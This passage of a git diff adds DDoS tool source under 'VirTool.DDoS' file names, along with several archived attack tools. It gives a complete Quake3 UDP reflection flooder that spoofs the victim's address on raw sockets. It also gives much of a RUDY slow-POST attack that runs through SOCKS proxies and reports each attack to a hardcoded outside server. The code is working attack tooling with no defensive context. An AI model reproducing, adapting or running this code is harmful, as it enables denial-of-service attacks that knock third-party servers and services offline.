+		sleep(1);
+		//printf("R/s: %d\n", rps);
+		//rps = 0;
+	}
+	return 0;
+}
+void freeparts()
+{
+	return;
+	if(returnparts[0]!=NULL) { free(returnparts[0]); }
+	if(returnparts[1]!=NULL) { free(returnparts[1]); }
+	if(returnparts[2]!=NULL) { free(returnparts[2]); }
+	if(returnparts[3]!=NULL) { free(returnparts[3]); }
+	if(returnparts[4]!=NULL) { free(returnparts[4]); }
+	if(returnparts[5]!=NULL) { free(returnparts[5]); }
+	if(returnparts[6]!=NULL) { free(returnparts[6]); }
+	if(returnparts[7]!=NULL) { free(returnparts[7]); }
+	/*if(returnparts[8]!=NULL) { free(returnparts[8]); }*/
+	return;
+}
+void setupparts()
+{
+	returnparts[0] = malloc(sizeof(struct urlparts));
+	returnparts[1] = malloc(sizeof(struct urlparts));
+	returnparts[2] = malloc(sizeof(struct urlparts));
+	returnparts[3] = malloc(sizeof(struct urlparts));
+	returnparts[4] = malloc(sizeof(struct urlparts));
+	returnparts[5] = malloc(sizeof(struct urlparts));
+	returnparts[6] = malloc(sizeof(struct urlparts));
+	returnparts[7] = malloc(sizeof(struct urlparts));
+	/*returnparts[8] = malloc(sizeof(struct urlparts));*/
+	bzero(returnparts[0], sizeof(struct urlparts));
+	bzero(returnparts[1], sizeof(struct urlparts));
+	bzero(returnparts[2], sizeof(struct urlparts));
+	bzero(returnparts[3], sizeof(struct urlparts));
+	bzero(returnparts[4], sizeof(struct urlparts));
+	bzero(returnparts[5], sizeof(struct urlparts));
+	bzero(returnparts[6], sizeof(struct urlparts));
+	bzero(returnparts[7], sizeof(struct urlparts));
+	/*bzero(returnparts[8], sizeof(struct urlparts));*/
+	returnparts[0]->name = "scheme";
+	strcpy(returnparts[0]->separator, ":");
+	returnparts[1]->name = "userid";
+	strcpy(returnparts[1]->separator, "@");
+	returnparts[2]->name = "password";
+	strcpy(returnparts[2]->separator, ":");
+	returnparts[3]->name = "host";
+	strcpy(returnparts[3]->separator, "//");
+	returnparts[4]->name = "port";
+	strcpy(returnparts[4]->separator, ":");
+	returnparts[5]->name = "path";
+	strcpy(returnparts[5]->separator, "/");
+	returnparts[6]->name = "param";
+	strcpy(returnparts[6]->separator, ";");
+	/*returnparts[7]->name = "query";
+	strcpy(returnparts[7]->separator, "?");*/
+	returnparts[7]->name = "fragment";
+	strcpy(returnparts[7]->separator, "#");
+	return;
+}
+int parseURL(char *url, struct urlparts **returnpart) {
+	register i;
+	int seplen;
+	char * remainder;
+	//char * regall = ":/;?#";
+	char * regall = ":/;#";
+	//char * regpath = ":;?#";
+	char * regpath = ":;#";
+	char * regx;
+	if(!*url)
+	{
+		strcpy(parseError, "nothing to do!\n");
+		return 0;
+	}
+	if((remainder = malloc(strlen(url) + 1)) == NULL)
+	{
+		printf("cannot allocate memory\n");
+		exit(-1);
+	}
+	strcpy(remainder, url);
+	if(firstpunc(remainder) == ':')
+	{
+		strcpy(returnpart[scheme]->value, strsplit(remainder, returnpart[scheme]->separator));
+		strleft(remainder, 1);
+	}
+	if (!strcmp(returnpart[scheme]->value, "mailto"))
+	*(returnpart[host]->separator) = 0;
+	for(i = 0; i < NUMPARTS; i++)
+	{
+		if(!*remainder)
+		break;
+		if(i == scheme || i == userid || i == password)
+		continue;
+		if(i == host && strchr(remainder, '@'))
+		{
+			if(!strncmp(remainder, "//", 2))
+			strleft(remainder, 2);
+			strcpy(returnpart[userid]->value, strsplit(remainder, ":@"));
+			strleft(remainder, 1);
+			if(strchr(remainder, '@'))
+			{
+				strcpy(returnpart[password]->value, strsplit(remainder, "@"));
+				strleft(remainder, 1);
+			}
+			*(returnpart[host]->separator) = 0;
+		}
+		if(i == path && (! *(returnpart[scheme]->value)))
+		{
+			*(returnpart[path]->separator) = 0;
+			strcpy(returnpart[scheme]->value, "http");
+		}
+		regx = (i == path) ? regpath : regall ;
+		seplen = strlen(returnpart[i]->separator);
+		if(strncmp(remainder, returnpart[i]->separator, seplen))
+		continue;
+		else
+		strleft(remainder, seplen);
+		strcpy(returnpart[i]->value, strsplit(remainder, regx));
+	}
+	if(*remainder)
+	sprintf(parseError, "I don't understand '%s'", remainder);
+	free(remainder);
+	return 0;
+}
+char *str_replace(char *orig, char *rep, char *with) {
+	char *result; 
+	char *ins;    
+	char *tmp;    
+	int len_rep;  
+	int len_with; 
+	int len_front; 
+	int count;    
+	if (!orig)
+	return NULL;
+	if (!rep || !(len_rep = strlen(rep)))
+	return NULL;
+	if (!(ins = strstr(orig, rep)))
+	return NULL;
+	if (!with)
+	with = "";
+	len_with = strlen(with);
+	for (count = 0; tmp = strstr(ins, rep); ++count) {
+		ins = tmp + len_rep;
+	}
+	tmp = result = malloc(strlen(orig) + (len_with - len_rep) * count + 1);
+	if (!result)
+	return NULL;
+	while (count--) {
+		ins = strstr(orig, rep);
+		len_front = ins - orig;
+		tmp = strncpy(tmp, orig, len_front) + len_front;
+		tmp = strcpy(tmp, with) + len_with;
+		orig += len_front + len_rep; 
+	}
+	strcpy(tmp, orig);
+	return result;
+}
+char *stristr(const char *String, const char *Pattern)
+{
+	char *pptr, *sptr, *start;
+	uint slen, plen;
+	for (start = (char *)String,
+	pptr = (char *)Pattern,
+	slen = strlen(String),
+	plen = strlen(Pattern);
+	slen >= plen;
+	start++, slen--)
+	{
+		
+		while (toupper(*start) != toupper(*Pattern))
+		{
+			start++;
+			slen--;
+			
+			if (slen < plen)
+			return(NULL);
+		}
+		sptr = start;
+		pptr = (char *)Pattern;
+		while (toupper(*sptr) == toupper(*pptr))
+		{
+			sptr++;
+			pptr++;
+			
+			if ('\0' == *pptr)
+			return (start);
+		}
+	}
+	return(NULL);
+}
+char * strsplit(char * s, char * tok) {
+#define OUTLEN (255)
+	register i, j;
+	static char out[OUTLEN + 1];
+	for(i = 0; s[i] && i < OUTLEN; i++)
+	{
+		if(strchr(tok, s[i]))
+		break;
+		else
+		out[i] = s[i];
+	}
+	out[i] = 0;
+	if(i && s[i])
+	{
+		for(j = 0; s[i]; i++, j++) s[j] = s[i];
+		s[j] = 0;
+	}
+	else if (!s[i])
+	*s = 0;
+	return out;
+}
+char firstpunc(char * s) {
+	while(*s++)
+	if(!isalnum(*s)) return *s;
+	return 0;
+}
+int strleft(char * s, int n) {
+	int l;
+	l = strlen(s);
+	if(l < n)
+	return -1;
+	else if (l == n)
+	*s = 0;
+	memmove(s, s + n, l - n + 1);
+	return n;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.Heartbleed.7z b/libs/VirTool.DDoS.Heartbleed.7z
new file mode 100644
index 00000000..27b3c3d3
Binary files /dev/null and b/libs/VirTool.DDoS.Heartbleed.7z differ
diff --git a/libs/VirTool.DDoS.MDNS.7z b/libs/VirTool.DDoS.MDNS.7z
new file mode 100644
index 00000000..1680253c
Binary files /dev/null and b/libs/VirTool.DDoS.MDNS.7z differ
diff --git a/libs/VirTool.DDoS.NETBIOS.7z b/libs/VirTool.DDoS.NETBIOS.7z
new file mode 100644
index 00000000..8678329d
Binary files /dev/null and b/libs/VirTool.DDoS.NETBIOS.7z differ
diff --git a/libs/VirTool.DDoS.NTP.7z b/libs/VirTool.DDoS.NTP.7z
new file mode 100644
index 00000000..27cc1897
Binary files /dev/null and b/libs/VirTool.DDoS.NTP.7z differ
diff --git a/libs/VirTool.DDoS.OVH.7z b/libs/VirTool.DDoS.OVH.7z
new file mode 100644
index 00000000..1088f4c8
Binary files /dev/null and b/libs/VirTool.DDoS.OVH.7z differ
diff --git a/libs/VirTool.DDoS.QUAKE3.c b/libs/VirTool.DDoS.QUAKE3.c
new file mode 100644
index 00000000..f444e262
--- /dev/null
+++ b/libs/VirTool.DDoS.QUAKE3.c
@@ -0,0 +1,210 @@
+/* quake3 amplification script */
+
+#include <time.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/udp.h>
+#include <arpa/inet.h>
+#define MAX_PACKET_SIZE 8192
+#define PHI 0x9e3779b9
+static uint32_t Q[4096], c = 362436;
+struct list
+{
+	struct sockaddr_in data;
+	struct list *next;
+	struct list *prev;
+};
+struct list *head;
+volatile int tehport;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
+void init_rand(uint32_t x)
+{
+	int i;
+	Q[0] = x;
+	Q[1] = x + PHI;
+	Q[2] = x + PHI + PHI;
+	for (i = 3; i < 4096; i++)
+	{
+	Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
+	}
+}
+uint32_t rand_cmwc(void)
+{
+	uint64_t t, a = 18782LL;
+	static uint32_t i = 4095;
+	uint32_t x, r = 0xfffffffe;
+	i = (i + 1) & 4095;
+	t = a * Q[i] + c;
+	c = (t >> 32);
+	x = t + c;
+	if (x < c) {
+	x++;
+	c++;
+	}
+	return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int nwords)
+{
+	unsigned long sum = 0;
+	for (sum = 0; nwords > 0; nwords--)
+	sum += *buf++;
+	sum = (sum >> 16) + (sum & 0xffff);
+	sum += (sum >> 16);
+	return (unsigned short)(~sum);
+}
+void setup_ip_header(struct iphdr *iph)
+{
+	iph->ihl = 5;
+	iph->version = 4;
+	iph->tos = 0;
+	iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 14;
+	iph->id = htonl(54321);
+	iph->frag_off = 0;
+	iph->ttl = MAXTTL;
+	iph->protocol = IPPROTO_UDP;
+	iph->check = 0;
+	iph->saddr = inet_addr("192.168.3.100");
+}
+void setup_udp_header(struct udphdr *udph)
+{
+	udph->source = htons(5678);
+	udph->dest = htons(27960);
+	udph->check = 0;
+	memcpy((void *)udph + sizeof(struct udphdr), "\xff\xff\xff\xff\x67\x65\x74\x73\x74\x61\x74\x75\x73\x0a", 14);
+	udph->len=htons(sizeof(struct udphdr) + 14);
+}
+void *flood(void *par1)
+{
+	struct thread_data *td = (struct thread_data *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
+	struct sockaddr_in sin = td->sin;
+	struct  list *list_node = td->list_node;
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+	fprintf(stderr, "Could not open raw socket.\n");
+	exit(-1);
+	}
+	init_rand(time(NULL));
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_udp_header(udph);
+	udph->source = htons(rand() % 65535 - 1026);
+	iph->saddr = sin.sin_addr.s_addr;
+	iph->daddr = list_node->data.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+	fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+	exit(-1);
+	}
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	while(1){
+		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
+		list_node = list_node->next;
+		iph->daddr = list_node->data.sin_addr.s_addr;
+		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+		iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
+		
+		pps++;
+		if(i >= limiter)
+		{
+			i = 0;
+			usleep(sleeptime);
+		}
+		i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+	if(argc < 6){
+	fprintf(stderr, "Invalid parameters!\n");
+	fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+		exit(-1);
+	}
+	srand(time(NULL));
+	int i = 0;
+	head = NULL;
+	fprintf(stdout, "Setting up sockets...\n");
+	int max_len = 128;
+	char *buffer = (char *) malloc(max_len);
+	buffer = memset(buffer, 0x00, max_len);
+	int num_threads = atoi(argv[4]);
+	int maxpps = atoi(argv[5]);
+	limiter = 0;
+	pps = 0;
+	int multiplier = 20;
+	FILE *list_fd = fopen(argv[3],  "r");
+	while (fgets(buffer, max_len, list_fd) != NULL) {
+		if ((buffer[strlen(buffer) - 1] == '\n') ||
+				(buffer[strlen(buffer) - 1] == '\r')) {
+			buffer[strlen(buffer) - 1] = 0x00;
+			if(head == NULL)
+			{
+				head = (struct list *)malloc(sizeof(struct list));
+				bzero(&head->data, sizeof(head->data));
+				head->data.sin_addr.s_addr=inet_addr(buffer);
+				head->next = head;
+				head->prev = head;
+			} else {
+				struct list *new_node = (struct list *)malloc(sizeof(struct list));
+				memset(new_node, 0x00, sizeof(struct list));
+				new_node->data.sin_addr.s_addr=inet_addr(buffer);
+				new_node->prev = head;
+				new_node->next = head->next;
+				head->next = new_node;
+			}
+			i++;
+		} else {
+			continue;
+		}
+	}
+	struct list *current = head->next;
+	pthread_t thread[num_threads];
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_addr.s_addr = inet_addr(argv[1]);
+	struct thread_data td[num_threads];
+	for(i = 0;i<num_threads;i++){
+		td[i].thread_id = i;
+		td[i].sin= sin;
+		td[i].list_node = current;
+		pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
+	}
+	fprintf(stdout, "Starting flood...\n");
+	for(i = 0;i<(atoi(argv[6])*multiplier);i++)
+	{
+		usleep((1000/multiplier)*1000);
+		if((pps*multiplier) > maxpps)
+		{
+			if(1 > limiter)
+			{
+				sleeptime+=100;
+			} else {
+				limiter--;
+			}
+		} else {
+			limiter++;
+			if(sleeptime > 25)
+			{
+				sleeptime-=25;
+			} else {
+				sleeptime = 0;
+			}
+		}
+		pps = 0;
+	}
+	return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.RUDY.c b/libs/VirTool.DDoS.RUDY.c
new file mode 100644
index 00000000..a0f176f6
--- /dev/null
+++ b/libs/VirTool.DDoS.RUDY.c
@@ -0,0 +1,1121 @@
+#include <pthread.h>
+#include <sys/resource.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <signal.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <ctype.h>
+char *useragents[] = {
+	"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
+	"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
+	"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
+	"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
+	"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
+	"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
+	"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
+	"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
+	"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
+	"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
+	"Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
+	"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
+	"Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
+	"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
+	"Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
+	"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
+	"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
+	"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
+	"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
+	"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
+	"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
+	"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
+	"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
+	"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
+	"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
+	"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
+	"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+	"Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
+};
+#define ATTACKPORT 80
+char *postformat = "POST /%s HTTP/1.1\r\nHost: %s\r\nUser-Agent: #useragent#\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: #contentlen#\r\n\r\n%s=";
+char *postpayload;
+struct urlparts {
+	char * name;
+	char separator[4];
+	char value[128];
+} parts[] = {
+	{ "scheme", ":" },
+	{ "userid", "@" },
+	{ "password", ":" },
+	{ "host", "//" },
+	{ "port", ":" },
+	{ "path", "/" },
+	{ "param", ";" },
+	{ "query", "?" },
+	{ "fragment", "#" }
+};
+enum partnames { scheme = 0, userid, password, host, port, path, param, query, fragment } ;
+#define NUMPARTS (sizeof parts / sizeof (struct urlparts))
+struct urlparts *returnparts[8];
+struct urllist { char *url; int done; struct urllist *next; struct urllist *prev; };
+struct proxy { char *type; char *ip; int port; int working; };
+struct list { struct proxy *data; char *useragent; struct list *next; struct list *prev; };
+struct list *head = NULL;
+char parseError[128];
+int parseURL(char *url, struct urlparts **returnpart);
+char * strsplit(char * s, char * tok);
+char firstpunc(char *s);
+int strleft(char * s, int n);
+void setupparts();
+void freeparts();
+char *stristr(const char *String, const char *Pattern);
+char *str_replace(char *orig, char *rep, char *with);
+char *geturl(char *url, char *useragent, char *ip);
+char *ipstr;
+
+void *flood(void *par) {
+	struct list *startpoint = (struct list *)par;
+	int i;
+	struct sockaddr_in serverAddr;
+	signal(SIGPIPE, SIG_IGN);
+	while(1)
+	{
+		int sent = 0;
+		if(startpoint->data->working == 0)
+		{
+			startpoint = startpoint->next;
+			sleep(1);
+			continue;
+		}
+		memset(&serverAddr, 0, sizeof(serverAddr));
+		serverAddr.sin_family = AF_INET;
+		serverAddr.sin_port = htons(startpoint->data->port);
+		serverAddr.sin_addr.s_addr = inet_addr(startpoint->data->ip);
+		int serverSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
+		u_int yes=1;
+		if (setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes)) < 0) {}
+		if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
+		{
+			startpoint->data->working = 0;
+			startpoint = startpoint->next;
+			continue;
+		}
+		if(strcmp(startpoint->data->type, "Socks4")==0)
+		{
+			unsigned char buf[10];
+			buf[0] = 0x04;
+			buf[1] = 0x01;
+			*(unsigned short*)&buf[2] = htons(ATTACKPORT);
+			*(unsigned long*)&buf[4] = inet_addr(ipstr);
+			buf[8] = 0x00;
+			if(send(serverSocket, buf, 9, MSG_NOSIGNAL) != 9)
+			{
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+		}
+		if(strcmp(startpoint->data->type, "Socks5")==0)
+		{
+			unsigned char buf[20];
+			buf[0] = 0x05;
+			buf[1] = 0x01;
+			buf[2] = 0x00;
+			if((sent = send(serverSocket, buf, 3, MSG_NOSIGNAL)) < 0)
+			{
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+			buf[0] = 0x05;
+			buf[1] = 0x01;
+			buf[2] = 0x00;
+			buf[3] = 0x01;
+			*(unsigned long*)&buf[4] = inet_addr(ipstr);
+			*(unsigned short*)&buf[8] = htons(ATTACKPORT);
+			if((sent = send(serverSocket, buf, 10, MSG_NOSIGNAL)) < 0)
+			{
+				printf("BAD PROXY ONLY SENT %d:%d\n", sent, 10);
+				perror("send 10");
+				startpoint->data->working = 0;
+				startpoint = startpoint->next;
+				close(serverSocket);
+				continue;
+			}
+		}
+		char *length = (char *)malloc(255);
+		sprintf(length, "%d", ((rand() % 10000) + 20000));
+		char *httppartpayload = str_replace(postpayload, "#useragent#", startpoint->useragent);
+		char *httppayload = str_replace(httppartpayload, "#contentlen#", length);
+		free(httppartpayload);
+		if(httppayload == NULL)
+		{
+			startpoint = startpoint->next;
+			close(serverSocket);
+			continue;
+		}
+		sent = send(serverSocket, httppayload, strlen(httppayload), MSG_NOSIGNAL);
+		//printf("sent main payload %d\n", sent);
+		free(httppayload);
+		//char *postshit = "Z";
+		//while(send(serverSocket, postshit, 1, MSG_NOSIGNAL) > 0)
+	//	{
+	//		sleep(1);
+			//printf(".");
+	//	}
+		int success;
+		do
+		{
+			char postshit = rand() % 97 + 26;
+			success = send(serverSocket, &postshit, 1, MSG_NOSIGNAL);
+			sleep(rand() % 3 + 1);
+			//printf(".");
+		} while (success > 0);
+		close(serverSocket);
+		usleep(30000);
+		//startpoint = startpoint->next;
+	}
+}
+
+int fnAttackInformation(int attackID)
+{
+	char szRecvBuff[1024];
+	char packet[1024];
+	char ip[] = "37.221.170.5";
+
+	snprintf(packet, sizeof(packet) - 1, "GET /~dqyefldi/response.php?auth=tru&id=%d&pro=%d HTTP/1.1\r\nHost: %s\r\nConnection: close\r\nCache-Control: no-cache\r\nOrigin: http://google.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-GB,en-US;q=0.8,en;q=0.6\r\nAccept-charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n", attackID, getpid(), ip);
+
+	struct sockaddr_in *remote;
+	int sock;
+	int tmpres;
+	
+ 
+	if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
+	{
+		perror("Can't create TCP socket");
+		exit(1);
+	}
+	
+	remote = (struct sockaddr_in *)malloc(sizeof(struct sockaddr_in *));
+	remote->sin_family = AF_INET;
+	tmpres = inet_pton(AF_INET, ip, (void *)(&(remote->sin_addr.s_addr)));
+	
+	if (tmpres < 0)  
+	{
+		perror("Can't set remote->sin_addr.s_addr");
+		exit(1);
+	}
+	else if (tmpres == 0)
+	{
+		fprintf(stderr, "%s is not a valid IP address\n", ip);
+		exit(1);
+	}
+	
+	remote->sin_port = htons(80);
+	
+	if (connect(sock, (struct sockaddr *)remote, sizeof(struct sockaddr)) < 0)
+	{
+		perror("Could not connect");
+		exit(1);
+	}
+		
+	tmpres = send(sock, packet, strlen(packet), 0);
+	
+	//printf("Sent %d bytes -> \n%s\n\n\n", tmpres, packet);	
+	
+	if (tmpres == -1){
+		perror("Can't send query");
+		exit(1);
+	}
+
+	int i = 1;
+	int dwTotal = 0;
+
+
+	while (1)
+	{
+		i = recv(sock, szRecvBuff + dwTotal, sizeof(szRecvBuff) - dwTotal, 0);
+		//printf("Received %d bytes\n", i);
+		if (i <= 0)
+			break;
+			
+		dwTotal += i;
+	}
+
+	szRecvBuff[dwTotal] = '\0';
+	
+
+	//printf("Received -> \n%s\n\n", szRecvBuff);
+
+	
+	close(sock);
+	
+	//printf("Sent %d bytes\n", tmpres);
+	
+	return 0;
+}
+
+int main(int argc, char *argv[ ]) {
+	if(argc < 5){
+		fprintf(stderr, "Invalid parameters!\n");
+		fprintf(stdout, "Usage: %s <target url> <auto scrape (1 or 0)> <number threads to use> <proxy list> <time> [manual ip (0 to disable)] [manual parameter]\n", argv[0]);
+		exit(-1);
+	}
+	//fprintf(stdout, "Setting up Sockets...\n");
+	int num_threads = atoi(argv[3]);
+	int scrapeit = atoi(argv[2]);
+	FILE *pFile = fopen(argv[4], "rb");
+	if(pFile==NULL)
+	{
+		perror("fopen"); exit(1);
+	}
+	fseek(pFile, 0, SEEK_END);
+	long lSize = ftell(pFile);
+	rewind(pFile);
+	char *buffer = (char *)malloc(lSize*sizeof(char));
+	fread(buffer, 1, lSize, pFile);
+	fclose (pFile);
+	int i=0;
+	char *pch = (char *)strtok(buffer, ":");
+	while(pch != NULL)
+	{
+		if(head == NULL)
+		{
+			head = (struct list *)malloc(sizeof(struct list));
+			bzero(head, sizeof(struct list));
+			head->data = (struct proxy *)malloc(sizeof(struct proxy));
+			bzero(head->data, sizeof(struct proxy));
+			head->data->working = 1;
+			head->data->ip = malloc(strlen(pch)+1); strcpy(head->data->ip, pch);
+			pch = (char *)strtok(NULL, ":");
+			if(pch == NULL) exit(-1);
+			head->data->port = atoi(pch);
+			pch = (char *)strtok(NULL, ":");
+			head->data->type = malloc(strlen(pch)+1); strcpy(head->data->type, pch);
+			pch = (char *)strtok(NULL, ":");
+			head->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
+			head->next = head;
+			head->prev = head;
+		} else {
+			struct list *new_node = (struct list *)malloc(sizeof(struct list));
+			bzero(new_node, sizeof(struct list));
+			new_node->data = (struct proxy *)malloc(sizeof(struct proxy));
+			bzero(new_node->data, sizeof(struct proxy));
+			new_node->data->working = 1;
+			new_node->data->ip = malloc(strlen(pch)+1); strcpy(new_node->data->ip, pch);
+			pch = (char *)strtok(NULL, ":");
+			if(pch == NULL) break;
